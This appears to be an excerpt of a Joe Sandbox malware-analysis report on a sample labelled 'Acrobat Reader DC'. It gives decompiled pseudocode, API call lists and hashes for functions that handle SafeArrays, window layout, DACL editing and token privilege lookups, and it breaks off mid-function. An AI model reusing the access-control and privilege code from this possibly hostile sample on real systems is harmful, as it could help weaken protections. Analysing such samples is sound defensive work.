                                  				signed short _t161;
                                  				signed int _t183;
                                  				void* _t199;
                                  				signed short* _t202;
                                  				signed int _t204;
                                  				signed int _t208;
                                  				signed int _t210;
                                  				intOrPtr* _t212;
                                  				void* _t218;
                                  				void* _t219;
                                  				void* _t220;
                                  				void* _t227;
                                  
                                  				_t154 = _a8;
                                  				_t100 =  *_t154 & 0x0000ffff;
                                  				_t219 = _t218 - 0x2c;
                                  				_t212 = _a4;
                                  				if((_t100 & 0x00002000) == 0) {
                                  					L13:
                                  					return 0;
                                  				} else {
                                  					if((_t100 & 0x00004000) == 0) {
                                  						_t154 = _t154[4];
                                  						_v12 = _t154;
                                  						_t202 = _t154;
                                  					} else {
                                  						_t202 =  *(_t154[4]);
                                  						_v12 = _t202;
                                  					}
                                  					if(_t202 == 0) {
                                  						goto L13;
                                  					} else {
                                  						E0040E950(_t212, _t154);
                                  						 *((intOrPtr*)( *_t212 + 0x210)) =  *_t202;
                                  						_t105 =  *_t212;
                                  						_t155 = 0;
                                  						if( *((intOrPtr*)(_t105 + 0x210)) > 0) {
                                  							_t13 =  &(_t202[8]); // 0x479a60
                                  							_t199 = 0x10c;
                                  							_a8 = _t13;
                                  							do {
                                  								_a8 =  &(_a8[4]);
                                  								 *(_t199 + _t105) =  *_a8;
                                  								_t105 =  *_t212;
                                  								_t155 = _t155 + 1;
                                  								_t199 = _t199 + 4;
                                  							} while (_t155 <  *((intOrPtr*)(_t105 + 0x210)));
                                  						}
                                  						E0040E830(_t212, _t155, 0);
                                  						_t146 =  *( *_t212 + 8);
                                  						_t157 = _t202[1] & 0x0000ffff;
                                  						_t109 = _t157 & 0x00000f00;
                                  						_t220 = _t219 + 4;
                                  						_t227 = _t109 - 0x400;
                                  						if(_t227 > 0) {
                                  							__eflags = _t109 - 0x800;
                                  							if(_t109 == 0x800) {
                                  								_t110 =  &_v24;
                                  								__imp__#23(_t202, _t110);
                                  								__eflags = _t110;
                                  								if(_t110 >= 0) {
                                  									_t204 = 0;
                                  									__eflags = _t146;
                                  									if(__eflags > 0) {
                                  										_a4 = 0;
                                  										do {
                                  											_push(0x10);
                                  											_t113 = E004115D7(_t204, _t212, __eflags);
                                  											_t220 = _t220 + 4;
                                  											__eflags = _t113;
                                  											if(_t113 == 0) {
                                  												_t113 = 0;
                                  												__eflags = 0;
                                  											} else {
                                  												 *_t113 = 0;
                                  												 *((intOrPtr*)(_t113 + 8)) = 1;
                                  												 *((intOrPtr*)(_t113 + 0xc)) = 0;
                                  											}
                                  											 *( *((intOrPtr*)( *_t212)) + _t204 * 4) = _t113;
                                  											_v44 = 0x400c;
                                  											_v36 = _a4 + _v24;
                                  											E00468070( *( *((intOrPtr*)( *_t212)) + _t204 * 4),  &_v44);
                                  											_a4 = _a4 + 0x10;
                                  											_t204 = _t204 + 1;
                                  											__eflags = _t204 - _t146;
                                  										} while (__eflags < 0);
                                  									}
                                  									goto L57;
                                  								}
                                  								goto L58;
                                  							} else {
                                  								goto L30;
                                  							}
                                  						} else {
                                  							if(_t227 == 0) {
                                  								__imp__#23(_t202,  &_v20);
                                  								__eflags = _t109;
                                  								if(_t109 < 0) {
                                  									goto L58;
                                  								} else {
                                  									_t208 = 0;
                                  									__eflags = _t146;
                                  									if(__eflags > 0) {
                                  										do {
                                  											_push(0x10);
                                  											_t135 = E004115D7(_t208, _t212, __eflags);
                                  											_t220 = _t220 + 4;
                                  											__eflags = _t135;
                                  											if(_t135 == 0) {
                                  												_t135 = 0;
                                  												__eflags = 0;
                                  											} else {
                                  												 *_t135 = 0;
                                  												 *((intOrPtr*)(_t135 + 8)) = 1;
                                  												 *((intOrPtr*)(_t135 + 0xc)) = 0;
                                  											}
                                  											 *( *((intOrPtr*)( *_t212)) + _t208 * 4) = _t135;
                                  											_v44 = 9;
                                  											_v36 = _v20 + _t208 * 4;
                                  											E00468070( *( *((intOrPtr*)( *_t212)) + _t208 * 4),  &_v44);
                                  											_t208 = _t208 + 1;
                                  											__eflags = _t208 - _t146;
                                  										} while (__eflags < 0);
                                  									}
                                  									__imp__#24(_v12);
                                  									return 1;
                                  								}
                                  							} else {
                                  								if(_t109 == 0x100) {
                                  									__imp__#23(_t202,  &_v16);
                                  									__eflags = _t109;
                                  									if(_t109 >= 0) {
                                  										_t210 = 0;
                                  										__eflags = _t146;
                                  										if(__eflags > 0) {
                                  											do {
                                  												_push(0x10);
                                  												_t139 = E004115D7(_t210, _t212, __eflags);
                                  												_t220 = _t220 + 4;
                                  												__eflags = _t139;
                                  												if(_t139 == 0) {
                                  													_t139 = 0;
                                  													__eflags = 0;
                                  												} else {
                                  													 *_t139 = 0;
                                  													 *((intOrPtr*)(_t139 + 8)) = 1;
                                  													 *((intOrPtr*)(_t139 + 0xc)) = 0;
                                  												}
                                  												 *( *((intOrPtr*)( *_t212)) + _t210 * 4) = _t139;
                                  												_v44 = 8;
                                  												_v36 =  *((intOrPtr*)(_v16 + _t210 * 4));
                                  												E00468070( *( *((intOrPtr*)( *_t212)) + _t210 * 4),  &_v44);
                                  												_t210 = _t210 + 1;
                                  												__eflags = _t210 - _t146;
                                  											} while (__eflags < 0);
                                  										}
                                  										L57:
                                  										__imp__#24(_v12);
                                  									}
                                  									goto L58;
                                  								} else {
                                  									if(_t109 != 0x200) {
                                  										L30:
                                  										__eflags = _t157;
                                  										if(_t157 >= 0) {
                                  											goto L12;
                                  										} else {
                                  											__imp__#77(_t202,  &_a8);
                                  											_t161 = _a8;
                                  											_t120 = (_t161 & 0x0000ffff) + 0xfffffffe;
                                  											__eflags = _t120 - 0x15;
                                  											if(_t120 > 0x15) {
                                  												L42:
                                  												_t183 = _t161 & 0x0000ffff;
                                  												__eflags = _t183 & 0x00004000;
                                  												if((_t183 & 0x00004000) == 0) {
                                  													goto L12;
                                  												} else {
                                  													goto L43;
                                  												}
                                  											} else {
                                  												_t51 = _t120 + 0x46805a; // 0x6608558b
                                  												switch( *((intOrPtr*)(( *_t51 & 0x000000ff) * 4 +  &M00468042))) {
                                  													case 0:
                                  														_a4 = 2;
                                  														goto L36;
                                  													case 1:
                                  														L43:
                                  														_a4 = 4;
                                  														goto L36;
                                  													case 2:
                                  														_a4 = 8;
                                  														goto L36;
                                  													case 3:
                                  														_a4 = 1;
                                  														L36:
                                  														_t121 =  &_v8;
                                  														_push(_t121);
                                  														_push(_t202);
                                  														__imp__#23();
                                  														__eflags = _t121;
                                  														if(_t121 < 0) {
                                  															L58:
                                  															return 1;
                                  														} else {
                                  															_t205 = 0;
                                  															__eflags = _t146;
                                  															if(__eflags > 0) {
                                  																do {
                                  																	_push(0x10);
                                  																	_t123 = E004115D7(_t205, _t212, __eflags);
                                  																	_t220 = _t220 + 4;
                                  																	__eflags = _t123;
                                  																	if(_t123 == 0) {
                                  																		_t123 = 0;
                                  																		__eflags = 0;
                                  																	} else {
                                  																		 *_t123 = 0;
                                  																		 *((intOrPtr*)(_t123 + 8)) = 1;
                                  																		 *((intOrPtr*)(_t123 + 0xc)) = 0;
                                  																	}
                                  																	 *( *((intOrPtr*)( *_t212)) + _t205 * 4) = _t123;
                                  																	_t124 = _a8;
                                  																	_t163 = _t124 & 0x0000ffff;
                                  																	__eflags = _t163 & 0x00004000;
                                  																	if((_t163 & 0x00004000) == 0) {
                                  																		_t187 = 0x00004000 | _t124;
                                  																		__eflags = _t187;
                                  																		_v44 = _t187;
                                  																		_v36 = _v8;
                                  																	} else {
                                  																		_v44 = _t124;
                                  																		E00410E60( &_v36, _v8, _a4);
                                  																		_t220 = _t220 + 0xc;
                                  																	}
                                  																	E00468070( *( *((intOrPtr*)( *_t212)) + _t205 * 4),  &_v44);
                                  																	_v8 = _v8 + _a4;
                                  																	_t205 = _t205 + 1;
                                  																	__eflags = _t205 - _t146;
                                  																} while (__eflags < 0);
                                  															}
                                  															_push(_v12);
                                  															__imp__#24();
                                  															return 1;
                                  														}
                                  														goto L59;
                                  													case 4:
                                  														_t130 =  &_v8;
                                  														_push(_t130);
                                  														_push(_t202);
                                  														__imp__#23();
                                  														__eflags = _t130;
                                  														if(__eflags < 0) {
                                  															goto L12;
                                  														} else {
                                  															E00410E60(E00453132(_v8, __eflags, _t212, _t146), _v8, _t146);
                                  															_push(_t202);
                                  															__imp__#24();
                                  															return 1;
                                  														}
                                  														goto L59;
                                  													case 5:
                                  														goto L42;
                                  												}
                                  											}
                                  										}
                                  									} else {
                                  										L12:
                                  										E00408F40(_t202, _t212);
                                  										goto L13;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L59:
                                  			}




































                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                  • _memmove.LIBCMT ref: 00467EB8
                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                  • _memmove.LIBCMT ref: 00467F6C
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                  • String ID:
                                  • API String ID: 2170234536-0
                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E004357B7(intOrPtr _a4, intOrPtr _a8, struct HWND__* _a12, struct HWND__* _a16) {
                                  				struct tagRECT _v20;
                                  				void* _t55;
                                  				struct HWND__* _t57;
                                  				struct HWND__* _t59;
                                  				struct HWND__* _t61;
                                  				struct HWND__* _t62;
                                  				long _t67;
                                  				signed int _t68;
                                  				int _t69;
                                  				long _t73;
                                  				long _t83;
                                  				signed int _t92;
                                  				long _t99;
                                  				signed int _t100;
                                  				long _t103;
                                  				signed int _t104;
                                  				signed int _t108;
                                  				int _t109;
                                  				long _t113;
                                  				signed int _t117;
                                  				signed int _t119;
                                  				long _t123;
                                  				struct HWND__* _t127;
                                  				int _t131;
                                  				signed int _t133;
                                  
                                  				_t92 = _a12;
                                  				_t131 = 0;
                                  				_t127 = _a16;
                                  				if(_a8 != 1) {
                                  					_t57 = GetDlgItem( *(_a4 + 0x54), 1);
                                  					_a12 = _t57;
                                  					if(_t57 != 0) {
                                  						GetWindowRect(_t57,  &_v20);
                                  						_t123 = _v20.left;
                                  						_t83 = _v20.right;
                                  						if(_t123 > _t83) {
                                  							_t113 = _t123;
                                  							_t123 = _t83;
                                  							_t83 = _t113;
                                  							_v20.left = _t123;
                                  							_v20.right = _t83;
                                  						}
                                  						_t133 = _v20.top;
                                  						_t108 = _v20.bottom;
                                  						if(_t133 > _t108) {
                                  							_a16 = _t133;
                                  							_t133 = _t108;
                                  							_t108 = _a16;
                                  							_v20.top = _t133;
                                  							_v20.bottom = _t108;
                                  						}
                                  						_t124 = _t83 - _t123;
                                  						_t109 = _t108 - _t133;
                                  						asm("cdq");
                                  						asm("cdq");
                                  						_t131 = _t127 - _t109 - 0xa;
                                  						MoveWindow(_a12, (0xa - _t83 - _t123 - _t83 - _t123 >> 1) + (_t92 + (_t124 & 0x00000003) >> 2), _t131, _t124, _t109, 0);
                                  					}
                                  					_t59 = GetDlgItem( *(_a4 + 0x54), 2);
                                  					_a16 = _t59;
                                  					if(_t59 != 0) {
                                  						GetWindowRect(_t59,  &_v20);
                                  						_t103 = _v20.left;
                                  						_t73 = _v20.right;
                                  						if(_t103 > _t73) {
                                  							_v20.left = _t73;
                                  							_t73 = _t103;
                                  							_v20.right = _t73;
                                  						}
                                  						_t119 = _v20.top;
                                  						_t104 = _v20.bottom;
                                  						if(_t119 > _t104) {
                                  							_v20.top = _t104;
                                  							_t104 = _t119;
                                  							_v20.bottom = _t104;
                                  						}
                                  						_t74 = _t73 - _v20.left;
                                  						asm("cdq");
                                  						asm("cdq");
                                  						MoveWindow(_a16, (_t92 + _t92 * 2 + (_t119 & 0x00000003) >> 2) - (_t73 - _v20.left + 0xa - _t119 >> 1), _t131, _t74, _t104 - _v20.top, 0);
                                  					}
                                  					_t61 = GetDlgItem( *(_a4 + 0x54), 0x3e9);
                                  					_a16 = _t61;
                                  					if(_t61 != 0) {
                                  						GetWindowRect(_t61,  &_v20);
                                  						_t67 = _v20.left;
                                  						_t99 = _v20.right;
                                  						if(_t67 > _t99) {
                                  							_v20.left = _t99;
                                  							_v20.right = _t67;
                                  						}
                                  						_t100 = _v20.top;
                                  						_t68 = _v20.bottom;
                                  						if(_t100 > _t68) {
                                  							_t117 = _t100;
                                  							_t100 = _t68;
                                  							_t68 = _t117;
                                  							_v20.top = _t100;
                                  							_v20.bottom = _t68;
                                  						}
                                  						_t69 = _t68 - _t100;
                                  						_t131 = _t131 + 0xfffffffb - _t69;
                                  						MoveWindow(_a16, 0xa, _t131, _t92 - 0x14, _t69, 0);
                                  					}
                                  					_t62 = GetDlgItem( *(_a4 + 0x54), 0x3ea);
                                  					if(_t62 != 0) {
                                  						MoveWindow(_t62, 0xa, 0xa, _t92 + 0xffffffec, _t131 + 0xfffffffb, 0);
                                  					}
                                  					return InvalidateRect( *(_a4 + 0x54), 0, 1);
                                  				}
                                  				return _t55;
                                  			}

                                  APIs
                                  • GetDlgItem.USER32 ref: 004357DB
                                  • GetWindowRect.USER32 ref: 004357ED
                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                  • GetDlgItem.USER32 ref: 0043586A
                                  • GetWindowRect.USER32 ref: 0043587C
                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                  • GetDlgItem.USER32 ref: 004358DC
                                  • GetWindowRect.USER32 ref: 004358EE
                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                  • GetDlgItem.USER32 ref: 00435941
                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$ItemMoveRect$Invalidate
                                  • String ID:
                                  • API String ID: 3096461208-0
                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00445F35(void* __eflags, void* _a4, void* _a8, intOrPtr _a12) {
                                  				char _v5;
                                  				struct _ACL* _v12;
                                  				void* _v16;
                                  				struct _ACL* _v20;
                                  				struct _ACL* _v24;
                                  				long _v28;
                                  				char _v32;
                                  				int _v36;
                                  				int _v40;
                                  				intOrPtr _v48;
                                  				void _v52;
                                  				struct _ACL* _t70;
                                  				void* _t74;
                                  				void* _t78;
                                  				void* _t84;
                                  				void _t88;
                                  				struct _ACL* _t94;
                                  				signed short _t113;
                                  				intOrPtr* _t115;
                                  				struct _SECURITY_DESCRIPTOR* _t116;
                                  				long _t117;
                                  				void* _t118;
                                  				void* _t119;
                                  
                                  				_t118 = 0;
                                  				_t94 = 0;
                                  				_v5 = 0;
                                  				_v20 = 0;
                                  				_v24 = 0;
                                  				_v16 = 0;
                                  				_v28 = 4;
                                  				if(E00436E2B(_a4,  &_v28,  &_v20,  &_v32) == 0 || E00436DF7( &_v24, _v32) == 0) {
                                  					L20:
                                  					E00436BA9(_v20);
                                  					E00436BA9(_v24);
                                  					E00436BA9(_t94);
                                  					E00436BA9(_t118);
                                  					return _v5;
                                  				} else {
                                  					_v12 = 0;
                                  					if(GetSecurityDescriptorDacl(_v20,  &_v36,  &_v12,  &_v40) == 0) {
                                  						goto L20;
                                  					}
                                  					E00412F40( &_v52, 0, 0xc);
                                  					_t70 = _v12;
                                  					_t119 = _t119 + 0xc;
                                  					_v48 = 8;
                                  					if(_t70 == 0 || GetAclInformation(_t70,  &_v52, 0xc, 2) != 0) {
                                  						_t24 = GetLengthSid(_a8) * 2; // 0x18
                                  						_t74 = E00436DBF( &_v16, _v48 + _t24 + 0x10);
                                  						_t94 = _v16;
                                  						if(_t74 == 0) {
                                  							goto L20;
                                  						}
                                  						if(_v36 == _t118) {
                                  							L12:
                                  							_t36 = GetLengthSid(_a8) + 8; // 0x8
                                  							_t113 = _t36;
                                  							_t118 = E00436B91(_t113);
                                  							_t119 = _t119 + 4;
                                  							if(_t118 == 0) {
                                  								goto L20;
                                  							}
                                  							_t78 = _a8;
                                  							_t38 = _t118 + 8; // 0x8
                                  							 *(_t118 + 2) = _t113;
                                  							if(CopySid(GetLengthSid(_t78), _t38, _t78) == 0) {
                                  								goto L20;
                                  							}
                                  							_a8 = 0;
                                  							_t115 = _a12 + 4;
                                  							while(1) {
                                  								 *_t118 =  *((intOrPtr*)(_t115 - 4));
                                  								 *((char*)(_t118 + 1)) =  *((intOrPtr*)(_t115 - 3));
                                  								 *((intOrPtr*)(_t118 + 4)) =  *_t115;
                                  								if(AddAce(_t94, 2, 0xffffffff, _t118,  *(_t118 + 2) & 0x0000ffff) == 0) {
                                  									goto L20;
                                  								}
                                  								_t84 = _a8 + 1;
                                  								_t115 = _t115 + 0xc;
                                  								_a8 = _t84;
                                  								if(_t84 < 1) {
                                  									continue;
                                  								}
                                  								_t116 = _v24;
                                  								if(SetSecurityDescriptorDacl(_t116, 1, _t94, 0) != 0 && SetUserObjectSecurity(_a4,  &_v28, _t116) != 0) {
                                  									_v5 = 1;
                                  								}
                                  								goto L20;
                                  							}
                                  							goto L20;
                                  						}
                                  						_t88 = _v52;
                                  						if(_t88 == _t118) {
                                  							goto L12;
                                  						}
                                  						_t117 = 0;
                                  						if(_t88 <= _t118) {
                                  							goto L12;
                                  						}
                                  						while(GetAce(_v12, _t117,  &_v16) != 0 && AddAce(_t94, 2, 0xffffffff, _v16,  *(_v16 + 2) & 0x0000ffff) != 0) {
                                  							_t117 = _t117 + 1;
                                  							if(_t117 < _v52) {
                                  								continue;
                                  							}
                                  							goto L12;
                                  						}
                                  					}
                                  					goto L20;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00445F9B
                                  • _memset.LIBCMT ref: 00445FB0
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445FCF
                                  • GetLengthSid.ADVAPI32(?), ref: 00445FE1
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044601E
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0044603A
                                  • GetLengthSid.ADVAPI32(?), ref: 00446052
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044607B
                                  • CopySid.ADVAPI32(00000000), ref: 00446082
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004460B4
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004460D6
                                  • SetUserObjectSecurity.USER32 ref: 004460E9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3490752873-0
                                  • Opcode ID: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                  • Instruction ID: 246472a61925077f0ce062fd926fe76963597eff5ae69a3ad94d9fcadac7f974
                                  • Opcode Fuzzy Hash: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                  • Instruction Fuzzy Hash: FD51C0B1900209ABEB10DFA5DC84EEFB778AF49704F04C41EF515A7241D7B8E905CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00433784(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				char _v526;
                                  				char _v528;
                                  				char _v1052;
                                  				char _v1574;
                                  				char _v1576;
                                  				char _v2100;
                                  				char _v2624;
                                  				char _v3148;
                                  				char _v3672;
                                  				char _v4196;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t38;
                                  				char* _t53;
                                  				void* _t61;
                                  				intOrPtr _t81;
                                  				void* _t84;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t87;
                                  
                                  				_t61 = __ebx;
                                  				E00422240(0x1060);
                                  				_t82 = _a16;
                                  				_t81 = _a20;
                                  				_t38 = E00413E1F(_a16, 0x2a);
                                  				_t85 = _t84 + 8;
                                  				if(_t38 != 0) {
                                  					E00413A0E(_a4,  &_v2100,  &_v3148,  &_v4196,  &_v528);
                                  					E00413A0E(_t82,  &_v2100,  &_v3148,  &_v3672,  &_v1576);
                                  					_t86 = _t85 + 0x28;
                                  					if(_v528 == 0x2e) {
                                  						E00411567( &_v528,  &_v526);
                                  						_t86 = _t86 + 8;
                                  					}
                                  					if(_v1576 == 0x2e) {
                                  						E00411567( &_v1576,  &_v1574);
                                  						_t86 = _t86 + 8;
                                  					}
                                  					E00411567(_t81,  &_v2100);
                                  					E00411536(_t81,  &_v3148);
                                  					E004336C5(_t61,  &_v1576, _t81, 0x2e,  &_v528, _a12,  &_v1576,  &_v2624);
                                  					E004336C5(_t61,  &_v4196, _t81, 0x2e,  &_v4196, _a8,  &_v3672,  &_v1052);
                                  					_t87 = _t86 + 0x30;
                                  					if(_v2624 == 0) {
                                  						if(_v528 != 0) {
                                  							E00411536( &_v1052, ".");
                                  							_t53 =  &_v528;
                                  							goto L10;
                                  						}
                                  					} else {
                                  						E00411536( &_v1052, ".");
                                  						_t53 =  &_v2624;
                                  						L10:
                                  						E00411536( &_v1052, _t53);
                                  						_t87 = _t87 + 0x10;
                                  					}
                                  					return E00411536(_t81,  &_v1052);
                                  				} else {
                                  					return E00411567(_t81, _t82);
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                  • String ID:
                                  • API String ID: 136442275-0
                                  • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                  • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00436F47() {
                                  				void* _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				char _v20;
                                  				WCHAR* _v24;
                                  				struct _LUID _v32;
                                  				char _v36;
                                  				struct _LUID _v44;
                                  				void* _t32;
                                  				void* _t39;
                                  				void* _t41;
                                  				intOrPtr _t45;
                                  				intOrPtr* _t46;
                                  				intOrPtr* _t48;
                                  				intOrPtr* _t54;
                                  				void* _t58;
                                  				void* _t59;
                                  
                                  				_t54 = 0;
                                  				_v8 = 0;
                                  				_v12 = 0;
                                  				_t45 = 0;
                                  				_v20 = 0;
                                  				if(OpenThreadToken(GetCurrentProcess(), 8, 0,  &_v8) != 0 || OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                                  					if(E00436BC5(_v8,  &_v12,  &_v20) == 0 || LookupPrivilegeValueW(0, L"SeAssignPrimaryTokenPrivilege",  &_v44) == 0) {
                                  						L17:
                                  						_t54 = _v12;
                                  					} else {
                                  						_v36 = 0;
                                  						if(LookupPrivilegeValueW(0, L"SeIncreaseQuotaPrivilege",  &_v32) == 0) {
                                  							goto L17;
                                  						} else {
                                  							_v24 = 0;
                                  							_t54 = _v12;
                                  							_t58 = 0;
                                  							if( *_t54 > 0) {
                                  								_v12 = _t54 + 4;
                                  								do {
                                  									_t46 =  &_v36;
                                  									_v16 = 2;
                                  									do {
                                  										_t41 = E004119E3(_v12, _t46 - 8, 8);
                                  										_t59 = _t59 + 0xc;
                                  										if(_t41 == 0) {
                                  											 *_t46 = 1;
